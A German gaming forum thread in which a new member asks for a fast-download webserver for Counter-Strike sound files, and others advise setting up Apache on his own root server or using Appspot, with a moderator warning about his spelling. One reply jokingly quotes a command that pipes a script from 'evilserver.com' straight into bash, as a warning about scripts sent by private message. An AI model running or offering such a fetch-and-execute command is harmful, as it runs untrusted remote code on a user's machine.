fast-download-server !!

bashOr

New Member
Hi, Bin neu hier im forum, und wollte mal eine Frage in den raum werfen ^^

ich habe nen root-server mit czero server laufen, ich breuchte dringend nen fast-download-server nur um ( sounds ) runterzuladen ! ich würde dem jenigen der mir einen FAST-download server zu verfügung stellt nen Team-Speak server , anbieten oder nen CS server Public brauche wirklich dringend einen.. fast-dw-server über die slot kann man reden hätte jemand interesse ? würde mich freuen m.f.g Roman aka bashOr

Ein "Fast-Download-Server" für Gameserver ist nichts anderes als ein Webserver, der die Daten via HTTP an den Client liefert, statt dem propritärem Protokoll des Spiels. Was eben meistens deutlich schneller geht.
Da könntest du eben so gut jeden beliebigen Webspace dafür nutzen.

Stark genutzt produziert sowas im übrigen mehr Traffic (und damit Kosten) als du mit einem TS3-Sponsoring "ausgleichen" könntest. ;)

webspace^^

das problem ist ein webspace hab ich noch nicht und die gratis webspaces wie zb www.funpic.de oder ohost.de da leuft der download genau so lahm.. hab ich schon probiert ich breuchte nur nen schnelleren webspace,das sind 30 sounds und das ist echt lahm für jeden sounds 21 secunden warten und da kommt das problem das die leute die auf den Server joinen gleich wieder disconnecten weil es zu lange dauert ..:o edid: ts3 oder gameserver ist eh schon ein zu gutes angebot wen jemand interesse hätte andere leute verlangen nur ein( werbe banner ) auf der hp ...Daher ich noch keine hp habe wüsste ich nicht was ich anbieten könnte ...^^

Last edited by a moderator:
Wenn du Angebote erwartest, solltest du vielleicht dazu schreiben, von welchem Daten- und Traffic-Volumen du sprichst bzw. erwartest. ;)

Wieviel Datenvolumen benötigst du?
Und wieviel Traffic erwartest du? Ggf. kann ich dir 1-2 GB auf meinem Server bereitstellen - ist aktuell eh nicht viel drauf los.

traffic

also ich denke mal für nur 30 sounds ich brauch ja keine maps oder so is nur für sounds hätte da echt keine ahnung traffic 1 gb oder keine ahnung traffic sollte halt hoch sein das schnell ziht server ist auch nicht gut besucht weil er neu ist und eben die leute nicht solange downloaden webspace brauch ich nicht viel sind ja nur ein paar sounds also keine ahnung ehrlich gesagt wieviel :confused:

traffic

also ich hab echt keine ahnung wieviel traffic ich brauche aber sicher nicht viel weil es eben nur sounds sind und ein sound hat 160 KB (164.377 Bytes) zb

voodoo44 das währe cool wenn du mir das bereitstellen könntest aber ich weiss echt nicht wieviel traffic ich kan es ja mal ausprobieren zb das ich welche rauflade und dan zihe dan sehe ich eh wie schnell es geht

Tu uns allen bitte den Gefallen und schaue dir nochmal die Forenregeln an. Deine Rechtschreibung lässt doch sehr zu wünschen übrig (und macht es nicht leichter deine Posts zu verstehen).

Wieso erstellst du dir diesen nicht auf deinem "Root"?
Anleitungen gibt es genug.

MfG
Impact

root

Also ich hab mich da schon umgeschaut , gegoogelt aber bis jetz keine passende anleitung gefunden ! lg roman

Hallo,
Ich habe dir eben eine passende Anleitung per PN gesendet

Viel Glück dabei !

Wieso per PM? Kommt da ein

Code:
/bin/bash < <(curl -s http://evilserver.com/tolles_script_das_alles macht)

drin vor?

@bashOr: Nochmal von mir als MOD der NACHDRÜCKLICHE Hinweis, Deine Rechtschreibung zu verbessern. Du bist neu hier im Forum (Herzlich Willkommen!), daher weißt Du noch nicht, dass wir hier im Sinne einer guten Lesbarkeit sehr GENAU darauf achten. Du hast im Übrigen mit den Nutzungsregeln zugestimmt, Dich daran zu halten.

Sollte sich die schlechte Rechtschreibung fortsetzen, müssen wir leider zu (Ver-)Warnungen greifen. Wir hoffen auf Dein Verständnis.

Zum Thema: Du hast offensichtlich einen Rootserver. Warum konfigurierst Du Deinen Apachen nicht einfach und nutzt den Server als WebDL. Wie das geht, dazu gibts nun doch wirklich genug Tutorials, oder auch ein Video: http://www.youtube.com/watch?v=-YqpeDjqDDY .

Appspot scheint nett zu sein, ist aber viel mehr als hier gebraucht wird und kompliziert anscheinend die Einrichtung. Ergo wäre reiner Webspace wohl sinnvoller.

Appspot scheint nett zu sein, ist aber viel mehr als hier gebraucht wird und kompliziert anscheinend die Einrichtung.

Ja, ist etwas komplizierter, die Daten hochzubekommen - aber machbar. Und bis zu 1 GB Traffic/Tag außerdem kostenlos. Interessant ist dabei auch das Caching von Google in mehreren Rechenzentren.

Hm, der Tagestraffic könnte für einen gut benutzten Fast-DL Server schon leicht mal zu wenig sein (kommt auf die Menge der DLs an).

Aber er hat ja keine Angaben gemacht, welches Datenvolumen auftritt. Müsste man halt nachrechnen, 1 GB Datentransfer zusätzlich werden mit 0.12 $ berechnet.

Habe einen gut besuchten CSS Surfserver und benötige bis ~ 120 GB / Monat. Kommt halt immer auf die größe der maps an, die er verwendet. Die machen nunmal den größten Teil des Traffics aus. Wenn er einen Standartmaps Server hat und somit nur sounds und vielleicht ein paar Skins vom Server geladen werden müssen könnte 1 GB / Tag theoretisch ausreichen.

Back